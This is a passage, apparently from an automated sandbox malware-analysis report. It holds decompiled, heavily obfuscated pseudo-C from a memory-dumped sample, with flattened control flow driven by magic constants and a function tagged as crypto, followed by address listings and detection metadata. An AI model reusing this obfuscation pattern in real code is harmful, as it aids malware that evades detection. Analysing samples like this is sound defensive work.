				 *(_t950 + 0x74) =  *(_t950 + 0x74) + 0xffff105e;
				 *(_t950 + 0x74) =  *(_t950 + 0x74) << 2;
				 *(_t950 + 0x74) =  *(_t950 + 0x74) ^ 0xfffc558b;
				 *(_t950 + 0x1c) = 0xc0d2;
				 *(_t950 + 0x20) =  *(_t950 + 0x1c) / _t804;
				 *(_t950 + 0x20) =  *(_t950 + 0x20) + 0xffff43f4;
				 *(_t950 + 0x20) =  *(_t950 + 0x20) + 0xffff6466;
				 *(_t950 + 0x20) =  *(_t950 + 0x20) ^ 0xfffed62d;
				 *(_t950 + 0x70) = 0xbc2e;
				 *(_t950 + 0x70) =  *(_t950 + 0x70) >> 0xa;
				_t936 = 0x17;
				 *(_t950 + 0x70) =  *(_t950 + 0x70) / _t936;
				 *(_t950 + 0x70) =  *(_t950 + 0x70) ^ 0x00000c9d;
				 *(_t950 + 0xfc) = 0xf001;
				_t937 = 0x14;
				 *(_t950 + 0xf8) =  *(_t950 + 0xfc) * 0x7c;
				 *(_t950 + 0xf8) =  *(_t950 + 0xf8) ^ 0x0074021d;
				 *(_t950 + 0xc4) = 0x7c98;
				 *(_t950 + 0xc4) =  *(_t950 + 0xc4) << 9;
				 *(_t950 + 0xc4) =  *(_t950 + 0xc4) ^ 0x2380f655;
				 *(_t950 + 0xc4) =  *(_t950 + 0xc4) ^ 0x2379c4d7;
				 *(_t950 + 0xbc) = 0xfd89;
				 *(_t950 + 0xbc) =  *(_t950 + 0xbc) + 0xffff54c6;
				 *(_t950 + 0xbc) =  *(_t950 + 0xbc) / _t937;
				 *(_t950 + 0xbc) =  *(_t950 + 0xbc) ^ 0x00005764;
				_t805 =  *(_t950 + 0x13c);
				 *(_t950 + 0x10) =  *(_t950 + 0x140);
				while(1) {
					L1:
					_t896 =  *(_t950 + 0x14);
					while(1) {
						L2:
						while(1) {
							L3:
							_t954 = _t806 - 0x1dc05553;
							if(_t954 > 0) {
								goto L27;
							}
							L4:
							if(_t954 == 0) {
								_push( *((intOrPtr*)(_t950 + 0x120)));
								E002229E3(_t950 + 0x274, 0x400, E0023889D(0x23c6a0,  *(_t950 + 0x24), __eflags),  *(_t950 + 0x140),  *(_t950 + 0x44),  *(_t950 + 0x10c), _t950 + 0x17c, _t950 + 0x478,  *(_t950 + 0x80),  *(_t950 + 0x28));
								_t950 = _t950 + 0x24;
								E00232025( *(_t950 + 0x48), _t760,  *(_t950 + 0x3c),  *((intOrPtr*)(_t950 + 0x104)));
								_t751 =  *(_t950 + 0x18);
								_t806 = 0x23448a49;
								while(1) {
									L1:
									_t896 =  *(_t950 + 0x14);
									goto L2;
								}
							} else {
								_t955 = _t806 - 0x160634a6;
								if(_t955 > 0) {
									__eflags = _t806 - 0x16d97506;
									if(_t806 == 0x16d97506) {
										E0022F536( *(_t950 + 0x7c),  *(_t950 + 0x24),  *(_t950 + 0x70),  *((intOrPtr*)(_t950 + 0x144)));
										_t806 = 0x36d580c3;
										goto L13;
									} else {
										__eflags = _t806 - 0x1a0940a4;
										if(_t806 == 0x1a0940a4) {
											E0022839D(_t950 + 0x170, _t917);
											_t806 = 0x1dc05553;
											goto L13;
										} else {
											__eflags = _t806 - 0x1a22d724;
											if(_t806 != 0x1a22d724) {
												goto L44;
											} else {
												 *(_t950 + 0x138) =  *(_t950 + 0x138) & 0x00000000;
												 *(_t950 + 0x140) =  *(_t950 + 0x140) & 0x00000000;
												_t832 = _t950 + 0x13c;
												E0022C769(_t832, _t950 + 0x170,  *(_t950 + 0x88),  *(_t950 + 0x80), _t950 + 0x20c,  *(_t950 + 0x30), _t896, _t950 + 0x280, _t950 + 0x474,  *(_t950 + 0x3c),  *(_t950 + 0xf8),  *(_t950 + 0x90));
												_t950 = _t950 + 0x28;
												asm("sbb ecx, ecx");
												_t806 = (_t832 & 0xd5e50b3a) + 0x355eeb92;
												goto L13;
											}
										}
									}
								} else {
									if(_t955 == 0) {
										 *(_t950 + 0x160) = _t751;
										 *((intOrPtr*)(_t950 + 0x15c)) = 1;
										 *(_t950 + 0x160) = _t805;
										E002296CD(_t950 + 0x148,  *((intOrPtr*)(_t950 + 0xac)), _t950 + 0x158,  *(_t950 + 0x118));
										_pop(_t836);
										asm("sbb ecx, ecx");
										_t806 = (_t836 & 0x02a7bfa7) + 0x36d580c3;
										goto L13;
									} else {
										if(_t806 == 0x6ef04) {
											E0022F536( *(_t950 + 0x90),  *(_t950 + 0xc8),  *(_t950 + 0x84),  *(_t950 + 0x13c));
											_t806 = 0x16d97506;
											goto L13;
										} else {
											if(_t806 == 0x9a9cbcb) {
												_push(_t806);
												_push( *((intOrPtr*)(_t917 + 4)));
												_t941 = E002378B7(_t806);
												_t951 = _t950 + 4;
												_t805 = E00228736(_t780);
												__eflags = _t805;
												if(__eflags != 0) {
													_t751 = E00236B8A(_t941,  *((intOrPtr*)(_t951 + 0x58)), __eflags,  *((intOrPtr*)(_t951 + 0xfc)), _t805,  *_t917,  *((intOrPtr*)(_t951 + 0x30)),  *((intOrPtr*)(_t917 + 4)));
													_t950 = _t951 + 0x14;
													 *(_t950 + 0x10) = _t751;
													__eflags = _t751;
													if(__eflags == 0) {
														_push(_t805);
														_push( *(_t950 + 0xec));
														_t903 =  *(_t950 + 0xf8);
														_t817 =  *(_t950 + 0xbc);
														L48:
														E0022F536(_t817, _t903);
													} else {
														_t806 = 0x160634a6;
														while(1) {
															L1:
															_t896 =  *(_t950 + 0x14);
															goto L2;
														}
													}
												}
											} else {
												if(_t806 == 0xb43f6cc) {
													__eflags = E00239B45( *((intOrPtr*)(_t950 + 0xc74)),  *(_t950 + 0xd0),  *(_t950 + 0x9c), _t950 + 0x134);
													_t946 =  !=  ? 1 : _t946;
													_t806 = 0x2a19e3bf;
													 *(_t950 + 0x130) = _t946;
													L13:
													_t751 =  *(_t950 + 0x10);
													goto L14;
												} else {
													_t959 = _t806 - 0x13765d88;
													if(_t806 != 0x13765d88) {
														L44:
														__eflags = _t806 - 0x1a8884c7;
														if(__eflags != 0) {
															L14:
															_t896 =  *(_t950 + 0x14);
															continue;
														}
													} else {
														_push( *(_t950 + 0x108));
														_t787 = E0023889D(0x23c660,  *(_t950 + 0xa8), _t959);
														_t788 =  *0x23ca38; // 0x0
														_t790 =  *0x23ca38; // 0x0
														_t793 =  *0x23ca38; // 0x0
														E00237C6E(( *_t788)[2] & 0x000000ff, _t959,  *_t788, ( *_t788)[3] & 0x000000ff,  *(_t950 + 0x88),  *( *_t793) & 0x000000ff,  *(_t950 + 0xd0), ( *_t790)[1] & 0x000000ff,  *(_t950 + 0x110),  *(_t950 + 0x60),  *(_t950 + 0xdc),  *(_t950 + 0x118), _t950 + 0x1f0);
														_t950 = _t950 + 0x2c;
														E00232025( *(_t950 + 0xe4), _t787,  *(_t950 + 0x28),  *(_t950 + 0x3c));
														_t799 =  *0x23ca38; // 0x0
														_t806 = 0x261be6d7;
														_t896 = ( *_t799)[4] & 0x0000ffff;
														_t751 =  *(_t950 + 0x10);
														 *(_t950 + 0x14) = ( *_t799)[4] & 0x0000ffff;
														L2:
														L3:
														_t954 = _t806 - 0x1dc05553;
														if(_t954 > 0) {
															goto L27;
														}
													}
												}
											}
										}
									}
								}
							}
							L49:
							return _t946;
							L27:
							__eflags = _t806 - 0x23448a49;
							if(_t806 == 0x23448a49) {
								__eflags = E0023511B(_t950 + 0x140, _t950 + 0x174, _t950 + 0x14c);
								if(__eflags == 0) {
									_t806 = 0x6ef04;
									goto L44;
								} else {
									_t806 = 0x1a22d724;
									goto L13;
								}
							} else {
								__eflags = _t806 - 0x261be6d7;
								if(_t806 == 0x261be6d7) {
									_t918 = _t950 + 0x270;
									_t809 = 6;
									_t948 =  *(_t950 + 0x12c) % _t809 + 1;
									__eflags = _t948;
									while(__eflags != 0) {
										_t945 = ( *(_t950 + 0x130) & 0x0000000f) + 4;
										E0022D6C9( *(_t950 + 0x68), _t918, 1, _t945,  *(_t950 + 0xe8), _t950 + 0x130,  *((intOrPtr*)(_t950 + 0x58)));
										_t950 = _t950 + 0x18;
										_t919 = _t918 + _t945 * 2;
										_t803 = 0x2f;
										 *_t919 = _t803;
										_t918 = _t919 + 2;
										_t948 = _t948 - 1;
										__eflags = _t948;
									}
									_t946 =  *(_t950 + 0x130);
									 *_t918 = 0;
									_t806 = 0x1a0940a4;
									_t917 =  *((intOrPtr*)(_t950 + 0xc78));
									goto L1;
								} else {
									__eflags = _t806 - 0x2a19e3bf;
									if(_t806 == 0x2a19e3bf) {
										E0022F536( *((intOrPtr*)(_t950 + 0x58)),  *((intOrPtr*)(_t950 + 0xe0)),  *(_t950 + 0x4c),  *((intOrPtr*)(_t950 + 0x134)));
										_t806 = 0x355eeb92;
										goto L13;
									} else {
										__eflags = _t806 - 0x2ca20b85;
										if(_t806 == 0x2ca20b85) {
											 *(_t950 + 0x12c) = E00238C8F(_t806);
											_t806 = 0x9a9cbcb;
											goto L13;
										} else {
											__eflags = _t806 - 0x355eeb92;
											if(_t806 == 0x355eeb92) {
												E0022F536( *(_t950 + 0xd8),  *(_t950 + 0xd4),  *((intOrPtr*)(_t950 + 0x120)),  *((intOrPtr*)(_t950 + 0x14c)));
												_t806 = 0x6ef04;
												goto L13;
											} else {
												__eflags = _t806 - 0x36d580c3;
												if(_t806 == 0x36d580c3) {
													_push(_t805);
													_push( *(_t950 + 0xc0));
													_t903 =  *(_t950 + 0xcc);
													_t817 =  *(_t950 + 0x100);
													goto L48;
												} else {
													__eflags = _t806 - 0x397d406a;
													if(_t806 != 0x397d406a) {
														goto L44;
													} else {
														_t820 =  *(_t950 + 0x118);
														E0022F98C(_t950 + 0x14c, _t950 + 0x140,  *(_t950 + 0x94),  *((intOrPtr*)(_t950 + 0x128)),  *(_t950 + 0x84));
														_t950 = _t950 + 0x10;
														asm("sbb ecx, ecx");
														_t806 = (_t820 & 0xfc9ce882) + 0x16d97506;
														goto L13;
													}
												}
											}
										}
									}
								}
							}
							goto L49;
						}
					}
				}
			}

















































                                              0x00229fe6
                                              0x00229fed
                                              0x00229ff6
                                              0x00229ffe
                                              0x0022a005
                                              0x0022a006
                                              0x0022a00d
                                              0x0022a00e
                                              0x0022a00f
                                              0x0022a014
                                              0x0022a01f
                                              0x0022a022
                                              0x0022a02d
                                              0x0022a02f
                                              0x0022a038
                                              0x0022a043
                                              0x0022a048
                                              0x0022a053
                                              0x0022a067
                                              0x0022a06c
                                              0x0022a075
                                              0x0022a080
                                              0x0022a092
                                              0x0022a097
                                              0x0022a0a0
                                              0x0022a0ab
                                              0x0022a0b6
                                              0x0022a0be
                                              0x0022a0c6
                                              0x0022a0ce
                                              0x0022a0d9
                                              0x0022a0e4
                                              0x0022a0ec
                                              0x0022a0f7
                                              0x0022a102
                                              0x0022a10d
                                              0x0022a118
                                              0x0022a120
                                              0x0022a129
                                              0x0022a12e
                                              0x0022a134
                                              0x0022a13c
                                              0x0022a147
                                              0x0022a152
                                              0x0022a15a
                                              0x0022a165
                                              0x0022a177
                                              0x0022a17a
                                              0x0022a181
                                              0x0022a188
                                              0x0022a193
                                              0x0022a19b
                                              0x0022a1a0
                                              0x0022a1a8
                                              0x0022a1b0
                                              0x0022a1b8
                                              0x0022a1c0
                                              0x0022a1ca
                                              0x0022a1ce
                                              0x0022a1d4
                                              0x0022a1dc
                                              0x0022a1e7
                                              0x0022a1ef
                                              0x0022a1fa
                                              0x0022a202
                                              0x0022a206
                                              0x0022a20a
                                              0x0022a20f
                                              0x0022a217
                                              0x0022a222
                                              0x0022a22a
                                              0x0022a232
                                              0x0022a23d
                                              0x0022a248
                                              0x0022a253
                                              0x0022a25e
                                              0x0022a269
                                              0x0022a271
                                              0x0022a27c
                                              0x0022a287
                                              0x0022a292
                                              0x0022a29a
                                              0x0022a2a5
                                              0x0022a2b0
                                              0x0022a2bb
                                              0x0022a2c6
                                              0x0022a2db
                                              0x0022a2de
                                              0x0022a2df
                                              0x0022a2e6
                                              0x0022a2f1
                                              0x0022a2fc
                                              0x0022a304
                                              0x0022a30c
                                              0x0022a317
                                              0x0022a32a
                                              0x0022a331
                                              0x0022a33c
                                              0x0022a352
                                              0x0022a359
                                              0x0022a364
                                              0x0022a36f
                                              0x0022a382
                                              0x0022a389
                                              0x0022a394
                                              0x0022a39f
                                              0x0022a3aa
                                              0x0022a3b2
                                              0x0022a3bd
                                              0x0022a3c5
                                              0x0022a3cd
                                              0x0022a3d2
                                              0x0022a3da
                                              0x0022a3e5
                                              0x0022a3f0
                                              0x0022a3fb
                                              0x0022a406
                                              0x0022a411
                                              0x0022a41c
                                              0x0022a427
                                              0x0022a42f
                                              0x0022a434
                                              0x0022a43c
                                              0x0022a444
                                              0x0022a44c
                                              0x0022a460
                                              0x0022a467
                                              0x0022a472
                                              0x0022a47d
                                              0x0022a487
                                              0x0022a492
                                              0x0022a49d
                                              0x0022a4a5
                                              0x0022a4b0
                                              0x0022a4be
                                              0x0022a4c3
                                              0x0022a4ce
                                              0x0022a4d1
                                              0x0022a4d5
                                              0x0022a4da
                                              0x0022a4e2
                                              0x0022a4ea
                                              0x0022a4f2
                                              0x0022a4f7
                                              0x0022a4ff
                                              0x0022a507
                                              0x0022a512
                                              0x0022a51a
                                              0x0022a525
                                              0x0022a530
                                              0x0022a538
                                              0x0022a53d
                                              0x0022a545
                                              0x0022a54d
                                              0x0022a558
                                              0x0022a563
                                              0x0022a56e
                                              0x0022a57e
                                              0x0022a582
                                              0x0022a58a
                                              0x0022a58e
                                              0x0022a596
                                              0x0022a59e
                                              0x0022a5a6
                                              0x0022a5ab
                                              0x0022a5b3
                                              0x0022a5bb
                                              0x0022a5c6
                                              0x0022a5d1
                                              0x0022a5dc
                                              0x0022a5e7
                                              0x0022a5f2
                                              0x0022a5fd
                                              0x0022a609
                                              0x0022a60c
                                              0x0022a610
                                              0x0022a618
                                              0x0022a61d
                                              0x0022a625
                                              0x0022a638
                                              0x0022a63f
                                              0x0022a64a
                                              0x0022a652
                                              0x0022a657
                                              0x0022a65c
                                              0x0022a664
                                              0x0022a66c
                                              0x0022a679
                                              0x0022a67d
                                              0x0022a685
                                              0x0022a68d
                                              0x0022a695
                                              0x0022a6a5
                                              0x0022a6aa
                                              0x0022a6b0
                                              0x0022a6b5
                                              0x0022a6bd
                                              0x0022a6c5
                                              0x0022a6ce
                                              0x0022a6d3
                                              0x0022a6dd
                                              0x0022a6e2
                                              0x0022a6e8
                                              0x0022a6f0
                                              0x0022a6fb
                                              0x0022a706
                                              0x0022a711
                                              0x0022a719
                                              0x0022a71e
                                              0x0022a723
                                              0x0022a72b
                                              0x0022a733
                                              0x0022a73b
                                              0x0022a740
                                              0x0022a748
                                              0x0022a750
                                              0x0022a758
                                              0x0022a75d
                                              0x0022a762
                                              0x0022a76a
                                              0x0022a776
                                              0x0022a77b
                                              0x0022a785
                                              0x0022a78a
                                              0x0022a790
                                              0x0022a798
                                              0x0022a7a0
                                              0x0022a7ab
                                              0x0022a7b6
                                              0x0022a7c1
                                              0x0022a7d3
                                              0x0022a7d8
                                              0x0022a7e9
                                              0x0022a7ea
                                              0x0022a7f1
                                              0x0022a7fc
                                              0x0022a807
                                              0x0022a80f
                                              0x0022a81a
                                              0x0022a825
                                              0x0022a830
                                              0x0022a83b
                                              0x0022a846
                                              0x0022a854
                                              0x0022a858
                                              0x0022a860
                                              0x0022a868
                                              0x0022a872
                                              0x0022a87d
                                              0x0022a888
                                              0x0022a893
                                              0x0022a89b
                                              0x0022a8a0
                                              0x0022a8a5
                                              0x0022a8ad
                                              0x0022a8b5
                                              0x0022a8c0
                                              0x0022a8cb
                                              0x0022a8d6
                                              0x0022a8e1
                                              0x0022a8ec
                                              0x0022a8f7
                                              0x0022a902
                                              0x0022a90d
                                              0x0022a918
                                              0x0022a923
                                              0x0022a92b
                                              0x0022a936
                                              0x0022a941
                                              0x0022a955
                                              0x0022a95a
                                              0x0022a961
                                              0x0022a96c
                                              0x0022a977
                                              0x0022a982
                                              0x0022a989
                                              0x0022a991
                                              0x0022a99c
                                              0x0022a9a4
                                              0x0022a9ac
                                              0x0022a9b1
                                              0x0022a9b9
                                              0x0022a9c9
                                              0x0022a9cf
                                              0x0022a9d7
                                              0x0022a9df
                                              0x0022a9e7
                                              0x0022a9ef
                                              0x0022a9f8
                                              0x0022a9fd
                                              0x0022aa03
                                              0x0022aa0b
                                              0x0022aa1e
                                              0x0022aa1f
                                              0x0022aa26
                                              0x0022aa31
                                              0x0022aa3c
                                              0x0022aa44
                                              0x0022aa4f
                                              0x0022aa5a
                                              0x0022aa65
                                              0x0022aa79
                                              0x0022aa80
                                              0x0022aa92
                                              0x0022aa99
                                              0x0022aa9d
                                              0x0022aa9d
                                              0x0022aa9d
                                              0x0022aaa1
                                              0x0022aaa1
                                              0x0022aaa4
                                              0x0022aaa4
                                              0x0022aaa4
                                              0x0022aaaa
                                              0x00000000
                                              0x00000000
                                              0x0022aab0
                                              0x0022aab0
                                              0x0022adbb
                                              0x0022ae14
                                              0x0022ae19
                                              0x0022ae2d
                                              0x0022ae32
                                              0x0022ae38
                                              0x0022aa9d
                                              0x0022aa9d
                                              0x0022aa9d
                                              0x00000000
                                              0x0022aa9d
                                              0x0022aab6
                                              0x0022aab6
                                              0x0022aabc
                                              0x0022ace5
                                              0x0022aceb
                                              0x0022adaa
                                              0x0022adb1
                                              0x00000000
                                              0x0022acf1
                                              0x0022acf1
                                              0x0022acf7
                                              0x0022ad88
                                              0x0022ad8d
                                              0x00000000
                                              0x0022acfd
                                              0x0022acfd
                                              0x0022ad03
                                              0x00000000
                                              0x0022ad09
                                              0x0022ad10
                                              0x0022ad26
                                              0x0022ad2e
                                              0x0022ad64
                                              0x0022ad69
                                              0x0022ad6e
                                              0x0022ad76
                                              0x00000000
                                              0x0022ad76
                                              0x0022ad03
                                              0x0022acf7
                                              0x0022aac2
                                              0x0022aac2
                                              0x0022acac
                                              0x0022acbb
                                              0x0022acc2
                                              0x0022acc9
                                              0x0022acd1
                                              0x0022acd2
                                              0x0022acda
                                              0x00000000
                                              0x0022aac8
                                              0x0022aace
                                              0x0022ac86
                                              0x0022ac8d
                                              0x00000000
                                              0x0022aad4
                                              0x0022aada
                                              0x0022ac01
                                              0x0022ac02
                                              0x0022ac0b
                                              0x0022ac0d
                                              0x0022ac29
                                              0x0022ac2d
                                              0x0022ac2f
                                              0x0022ac4c
                                              0x0022ac51
                                              0x0022ac54
                                              0x0022ac58
                                              0x0022ac5a
                                              0x0022b013
                                              0x0022b014
                                              0x0022b01b
                                              0x0022b022
                                              0x0022b041
                                              0x0022b041
                                              0x0022ac60
                                              0x0022ac60
                                              0x0022aa9d
                                              0x0022aa9d
                                              0x0022aa9d
                                              0x00000000
                                              0x0022aa9d
                                              0x0022aa9d
                                              0x0022ac5a
                                              0x0022aae0
                                              0x0022aae6
                                              0x0022abcb
                                              0x0022abcf
                                              0x0022abd2
                                              0x0022abd7
                                              0x0022abde
                                              0x0022abde
                                              0x00000000
                                              0x0022aaec
                                              0x0022aaec
                                              0x0022aaf2
                                              0x0022b006
                                              0x0022b006
                                              0x0022b00c
                                              0x0022abe2
                                              0x0022abe2
                                              0x00000000
                                              0x0022abe2
                                              0x0022aaf8
                                              0x0022aaf8
                                              0x0022ab0b
                                              0x0022ab12
                                              0x0022ab3b
                                              0x0022ab4e
                                              0x0022ab6c
                                              0x0022ab71
                                              0x0022ab85
                                              0x0022ab8a
                                              0x0022ab91
                                              0x0022ab98
                                              0x0022ab9c
                                              0x0022aba0
                                              0x0022aaa1
                                              0x0022aaa4
                                              0x0022aaa4
                                              0x0022aaaa
                                              0x00000000
                                              0x00000000
                                              0x0022aaaa
                                              0x0022aaf2
                                              0x0022aae6
                                              0x0022aada
                                              0x0022aace
                                              0x0022aac2
                                              0x0022aabc
                                              0x0022b04a
                                              0x0022b054
                                              0x0022ae42
                                              0x0022ae42
                                              0x0022ae48
                                              0x0022afef
                                              0x0022aff1
                                              0x0022b001
                                              0x00000000
                                              0x0022aff3
                                              0x0022aff3
                                              0x00000000
                                              0x0022aff3
                                              0x0022ae4e
                                              0x0022ae4e
                                              0x0022ae54
                                              0x0022af59
                                              0x0022af64
                                              0x0022af69
                                              0x0022af69
                                              0x0022af6a
                                              0x0022af94
                                              0x0022af9b
                                              0x0022afa0
                                              0x0022afa3
                                              0x0022afa8
                                              0x0022afa9
                                              0x0022afac
                                              0x0022afaf
                                              0x0022afaf
                                              0x0022afaf
                                              0x0022afb2
                                              0x0022afbb
                                              0x0022afbe
                                              0x0022afc7
                                              0x00000000
                                              0x0022ae5a
                                              0x0022ae5a
                                              0x0022ae60
                                              0x0022af41
                                              0x0022af48
                                              0x00000000
                                              0x0022ae66
                                              0x0022ae66
                                              0x0022ae6c
                                              0x0022af1a
                                              0x0022af21
                                              0x00000000
                                              0x0022ae72
                                              0x0022ae72
                                              0x0022ae78
                                              0x0022aef6
                                              0x0022aefd
                                              0x00000000
                                              0x0022ae7a
                                              0x0022ae7a
                                              0x0022ae80
                                              0x0022b02b
                                              0x0022b02c
                                              0x0022b033
                                              0x0022b03a
                                              0x00000000
                                              0x0022ae86
                                              0x0022ae86
                                              0x0022ae8c
                                              0x00000000
                                              0x0022ae92
                                              0x0022aeb5
                                              0x0022aebd
                                              0x0022aec2
                                              0x0022aec7
                                              0x0022aecf
                                              0x00000000
                                              0x0022aecf
                                              0x0022ae8c
                                              0x0022ae80
                                              0x0022ae78
                                              0x0022ae6c
                                              0x0022ae60
                                              0x0022ae54
                                              0x00000000
                                              0x0022ae48
                                              0x0022aaa4
                                              0x0022aaa1

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: "m$#}$%$./$25$5a$<8$=;$C/$KZ$Lf$M#$Q[$Q$S'$Z9$cA$dW$j@}9$jg$m$m9$nXj$p=4E$tu${$}=$E$NS5$q$w
                                              • API String ID: 0-3061497230
                                              • Opcode ID: bf67753877c7dd6c6aeb7e45e1f15ccd9f03751c34dd239ccbd9272cec92a9c9
                                              • Instruction ID: ad6a827ed9eafdbd19fa61ed6eb4897dbeba6c62bc8885261f131cb119005607
                                              • Opcode Fuzzy Hash: bf67753877c7dd6c6aeb7e45e1f15ccd9f03751c34dd239ccbd9272cec92a9c9
                                              • Instruction Fuzzy Hash: 3D82447151C3819BE378CF65C549B9BBBE1BBC4318F10891DE29A862A0CBB58959CF43
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0022C769, Relevance: 24.4, Strings: 19, Instructions: 630COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 95%
                                              			E0022C769(intOrPtr __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				char _v4;
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				unsigned int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				intOrPtr _v316;
				char _v320;
				intOrPtr _t666;
				intOrPtr _t667;
				intOrPtr _t672;
				void* _t679;
				intOrPtr _t680;
				intOrPtr _t687;
				intOrPtr _t689;
				intOrPtr _t693;
				intOrPtr* _t694;
				signed int _t706;
				intOrPtr _t707;
				void* _t712;
				intOrPtr _t718;
				void* _t758;
				signed int _t773;
				signed int _t774;
				signed int _t775;
				signed int _t776;
				signed int _t777;
				signed int _t778;
				signed int _t779;
				signed int _t780;
				signed int _t781;
				signed int _t782;
				signed int _t783;
				signed int _t784;
				intOrPtr _t785;
				signed int _t786;
				intOrPtr _t788;
				char _t793;
				void* _t795;
				void* _t797;

				_t694 = __edx;
				_push(_a40);
				_push(_a36);
				_v20 = __ecx;
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20 & 0x0000ffff);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0022602B(_a20 & 0x0000ffff);
				_v12 = 0x78501c;
				_v24 = 0;
				_v8 = 0;
				_t793 = 0;
				_v4 = 0;
				_t795 =  &_v320 + 0x30;
				_v232 = 0x7906;
				_t786 = 0xcd25e5e;
				_v232 = _v232 << 6;
				_v232 = _v232 >> 0xa;
				_v232 = _v232 ^ 0x00000790;
				_v156 = 0xf83b;
				_v156 = _v156 >> 0xb;
				_v156 = _v156 ^ 0x0000000c;
				_v52 = 0x2ceb;
				_v52 = _v52 | 0xa5610ac4;
				_v52 = _v52 ^ 0xa5612e27;
				_v208 = 0x96db;
				_v208 = _v208 + 0xffffce2c;
				_v208 = _v208 | 0x71346f29;
				_v208 = _v208 ^ 0x7134ef2f;
				_v116 = 0x28a4;
				_v116 = _v116 + 0xffff342e;
				_v116 = _v116 ^ 0xffff1cd2;
				_v124 = 0xa3bc;
				_v124 = _v124 + 0xffffb3e2;
				_v124 = _v124 ^ 0x0040579e;
				_v132 = 0x4a92;
				_v132 = _v132 << 0xb;
				_v132 = _v132 ^ 0x02509000;
				_v140 = 0xcc93;
				_v140 = _v140 >> 0xd;
				_v140 = _v140 ^ 0x04000006;
				_v148 = 0xadf6;
				_v148 = _v148 >> 5;
				_v148 = _v148 ^ 0x0008056f;
				_v216 = 0xcf16;
				_v216 = _v216 ^ 0x2caffd24;
				_v216 = _v216 >> 8;
				_v216 = _v216 ^ 0x002cad32;
				_v296 = 0xe55e;
				_v296 = _v296 << 0x10;
				_v296 = _v296 + 0xffff79ea;
				_v296 = _v296 << 5;
				_v296 = _v296 ^ 0xabaf3c40;
				_v152 = 0xf9a;
				_v16 = 0;
				_v320 = 0;
				_v152 = _v152 * 0x3f;
				_v152 = _v152 ^ 0x8003d6e6;
				_v120 = 0x15;
				_v120 = _v120 << 2;
				_v120 = _v120 ^ 0x00000054;
				_v144 = 0x2eae;
				_v144 = _v144 + 0x3c19;
				_v144 = _v144 ^ 0x00006ac4;
				_v56 = 0xab01;
				_t773 = 0x5e;
				_v56 = _v56 / _t773;
				_v56 = _v56 ^ 0x00004cb8;
				_v104 = 0x2a8e;
				_t774 = 0x2c;
				_v104 = _v104 / _t774;
				_v104 = _v104 ^ 0x000033ed;
				_v292 = 0xd22b;
				_v292 = _v292 | 0xd3babaa8;
				_t775 = 0x50;
				_v292 = _v292 * 0x6c;
				_v292 = _v292 >> 7;
				_v292 = _v292 ^ 0x00a58d92;
				_v96 = 0x39fa;
				_v96 = _v96 / _t775;
				_v96 = _v96 ^ 0x00002d01;
				_v240 = 0xf5d4;
				_v240 = _v240 ^ 0x5b9fa071;
				_v240 = _v240 >> 3;
				_v240 = _v240 ^ 0x0b73efef;
				_v248 = 0x1311;
				_t776 = 0x42;
				_v248 = _v248 / _t776;
				_v248 = _v248 + 0x5e6d;
				_v248 = _v248 ^ 0x00004acc;
				_v88 = 0x907;
				_t777 = 0x6e;
				_v88 = _v88 * 0x48;
				_v88 = _v88 ^ 0x0002ff0c;
				_v36 = 0x8ec2;
				_v36 = _v36 / _t777;
				_v36 = _v36 ^ 0x00005772;
				_v260 = 0x4792;
				_v260 = _v260 << 0xd;
				_v260 = _v260 >> 0xb;
				_v260 = _v260 >> 4;
				_v260 = _v260 ^ 0x00006a86;
				_v224 = 0x4f89;
				_v224 = _v224 + 0xffff3059;
				_t778 = 0x21;
				_v224 = _v224 * 0x6e;
				_v224 = _v224 ^ 0xffc8e4d3;
				_v48 = 0x8858;
				_v48 = _v48 + 0x804a;
				_v48 = _v48 ^ 0x00017e21;
				_v312 = 0xd58c;
				_v312 = _v312 | 0x45747a0f;
				_v312 = _v312 >> 0xa;
				_v312 = _v312 / _t778;
				_v312 = _v312 ^ 0x00008646;
				_v300 = 0xadcd;
				_v300 = _v300 >> 8;
				_v300 = _v300 << 9;
				_v300 = _v300 >> 1;
				_v300 = _v300 ^ 0x00008fc4;
				_v268 = 0xd742;
				_t779 = 0x30;
				_v268 = _v268 / _t779;
				_v268 = _v268 + 0x61d9;
				_v268 = _v268 >> 4;
				_v268 = _v268 ^ 0x00000191;
				_v204 = 0x8d76;
				_v204 = _v204 | 0x1111a955;
				_v204 = _v204 << 5;
				_v204 = _v204 ^ 0x2235a282;
				_v64 = 0x8939;
